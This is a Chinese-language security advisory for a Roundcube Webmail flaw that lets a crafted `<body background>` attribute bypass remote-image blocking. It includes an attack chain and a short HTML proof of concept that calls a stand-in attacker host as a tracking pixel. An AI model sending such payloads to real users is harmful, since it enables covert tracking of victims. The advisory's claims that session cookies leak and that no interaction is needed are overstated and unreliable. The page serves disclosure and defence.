CVE-2026-35542 CVSS 5.3 中危

CVE-2026-35542 Roundcube远程图片阻断绕过漏洞

披露日期: 2026-04-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35542

漏洞类型

安全特性绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Roundcube Webmail

漏洞概述

Roundcube Webmail在1.5.14和1.6.14之前的版本中存在一个安全漏洞，该漏洞与远程图像阻断功能有关。攻击者可以通过发送一封特制的电子邮件，在邮件HTML内容的BODY元素中注入精心设计的background属性。由于Roundcube未能正确过滤这一特定属性，导致其远程图片保护机制失效。当受害者查看这封邮件时，浏览器会尝试加载攻击者指定的远程背景图片。这一行为不仅确认了邮件已被阅读，还可能导致受害者的IP地址、会话令牌等敏感信息泄露给攻击者，从而造成信息泄露或访问控制绕过的风险。

技术细节

该漏洞的根本原因在于Roundcube Webmail对HTML邮件内容的清理机制存在疏漏。为了保护用户隐私，防止被Web Bug追踪，Webmail通常会拦截或替换外部资源的引用。然而，在受影响的版本中，系统未能识别`<body>`标签上的`background`属性所引用的外部URL。攻击者利用这一逻辑缺陷，构造包含恶意背景链接的HTML邮件。当用户在Web界面预览或打开邮件时，解析器未移除该属性，浏览器随即向攻击者控制的服务器发起请求。由于该请求携带了用户的Cookie或User-Agent等信息，攻击者便能验证邮箱活跃度或窃取部分上下文信息。这种攻击方式无需用户交互即可触发，且隐蔽性较高，因为它利用了看似合法的HTML渲染特性，绕过了常规的src属性过滤规则。

攻击链分析

STEP 1

步骤1

攻击者构造包含恶意BODY background属性的HTML邮件内容。

STEP 2

步骤2

攻击者将构造好的邮件发送给使用Roundcube Webmail的目标用户。

STEP 3

步骤3

目标用户在Webmail界面中打开或预览该邮件。

STEP 4

步骤4

Roundcube的HTML解析器未能过滤掉BODY标签中的background属性。

STEP 5

步骤5

受害者浏览器向攻击者服务器请求背景图片资源，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2026-35542 -->
<!-- Send this HTML as an email body to trigger the bypass -->
<html>
<body background="http://attacker-controlled-server.com/track_pixel.jpg">
    <h1>Testing Remote Image Blocking</h1>
    <p>If the remote image blocking is bypassed, the server will log a request for track_pixel.jpg.</p>
</body>
</html>

影响范围

Roundcube Webmail < 1.5.14

Roundcube Webmail < 1.6.14

防御指南

临时缓解措施

建议管理员立即检查并升级到修复版本。在无法立即升级的情况下，可以考虑在邮件网关处部署额外的过滤规则，剥离HTML邮件中body标签的background属性，或者强制用户仅以纯文本模式查看邮件，以防止潜在的追踪和信息泄露。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表